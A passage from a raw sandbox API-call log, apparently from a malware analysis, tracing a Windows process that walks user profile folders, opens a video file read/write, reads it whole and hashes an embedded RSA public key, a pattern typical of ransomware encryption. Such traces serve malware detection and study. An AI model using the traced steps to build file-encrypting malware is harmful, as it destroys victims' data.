(HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.376] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\SendTo\\") returned="SendTo\\" [0195.376] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.376] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.376] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.376] PathFindFileNameW (pszPath="") returned="" [0195.376] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\SendTo\\*" (normalized: "c:\\users\\keecfmwgj\\sendto\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0195.377] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.377] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.377] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Start Menu\\") returned="Start Menu\\" [0195.377] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.377] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.377] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.377] PathFindFileNameW (pszPath="") returned="" [0195.377] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Start Menu\\*" (normalized: "c:\\users\\keecfmwgj\\start menu\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0195.377] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.377] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.377] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Templates\\") returned="Templates\\" [0195.377] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.377] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.378] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.378] PathFindFileNameW (pszPath="") returned="" [0195.378] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Templates\\*" (normalized: "c:\\users\\keecfmwgj\\templates\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0195.378] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.378] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.378] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0195.378] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.378] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.378] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.378] PathFindFileNameW (pszPath="") returned="" [0195.378] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9873ac90, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9873ac90, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0195.379] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9873ac90, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9873ac90, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.379] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3d16240, ftCreationTime.dwHighDateTime=0x1d8a3e8, ftLastAccessTime.dwLowDateTime=0x635b5f20, ftLastAccessTime.dwHighDateTime=0x1d8a5f6, ftLastWriteTime.dwLowDateTime=0x635b5f20, ftLastWriteTime.dwHighDateTime=0x1d8a5f6, nFileSizeHigh=0x0, nFileSizeLow=0xd45e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6s3WjoHyRIY3EiBz5-U.avi", cAlternateFileName="6S3WJO~1.AVI")) returned 1 [0195.379] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\6s3WjoHyRIY3EiBz5-U.avi") returned=".avi" [0195.379] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\6s3WjoHyRIY3EiBz5-U.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\6s3wjohyriy3eibz5-u.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.379] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=54366) returned 1 [0195.379] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.382] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd438, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.382] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.385] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.385] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xd45e, lpOverlapped=0x0) returned 1 [0195.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.386] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.387] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.387] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.387] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.388] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.388] GetLastError () returned 0x0 [0195.388] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.388] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.388] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.388] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.388] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd460) returned 0x2ea79b0 [0195.389] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0195.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea13c8 [0195.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.390] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ca8 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2c90 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0195.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.394] HeapFree (in: hHeap=0x620000, 